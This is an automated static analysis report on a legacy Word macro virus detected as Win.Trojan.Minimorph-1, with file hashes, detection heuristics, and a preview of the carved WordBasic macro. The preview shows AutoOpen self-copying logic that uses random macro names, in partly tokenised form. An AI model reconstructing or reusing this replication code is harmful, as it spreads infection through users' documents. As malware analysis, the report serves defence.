Win.Trojan.Minimorph-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 fd9fb96c8e71cfbc…

MALICIOUS

Office (OLE)

6.0 KB First seen: 2012-06-14
MD5: 969135a0601796fdaed40c4134ea1951 SHA-1: 0ddaa104091f2e1688714da94de37ebecc11e375 SHA-256: fd9fb96c8e71cfbc5d1361a3248dabdee6ff746c427d0ee28a6b3145174d138e
102 Risk Score

Malware Insights

Win.Trojan.Minimorph-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits characteristics of a legacy macro virus, specifically identified by the "RSN MACRO VIRUS" marker and the ClamAV detection as Win.Trojan.Minimorph-1. The presence of WordBasic macro virus markers and the explicit mention of "RSN MACRO VIRUS Goat file" in the document body strongly indicate a malicious intent to execute embedded code. The document body also contains references to AutoOpen macros, a common technique for automatic execution.

Heuristics 3

  • ClamAV: Win.Trojan.Minimorph-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Minimorph-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCE
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
wordbasic_macros.txt wordbasic-macro analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) 444 bytes
SHA-256: 420c0136c6b4894bd0c01e9f8cd9d8833b5ef03354f7c1b09e802554814af458
Preview script
First 1,000 lines of the extracted script
MAIN
, -
@cmd8111 0
DUHIM$ = @cmd8025
@cmd80c2 DUHIM$ = ":AutoOpen" , "AutoOpen"
@cmd80c2 "AutoOpen" , DUHIM$ = ":AutoOpen"
@cmd0054 = 1
DCLUL = @cmd8002 @cmd800e 3 = 5
PPWMS = 1 DCLUL
A$ = A$ = @cmd8005 @cmd8002 @cmd800e 26 = 65
B$ = B$ = @cmd8005 @cmd8002 @cmd800e 26 = 65
C$ = C$ = @cmd8005 @cmd8002 @cmd800e 26 = 65
PPWMS
@cmd00d7 = "AutoOpen" ,
@cmd0075 = "DUHIM" , = A$ ,
@cmd0075 = "PPWMS" , = B$ ,
@cmd0075 = "DCLUL" , = C$ ,
@cmd809f 1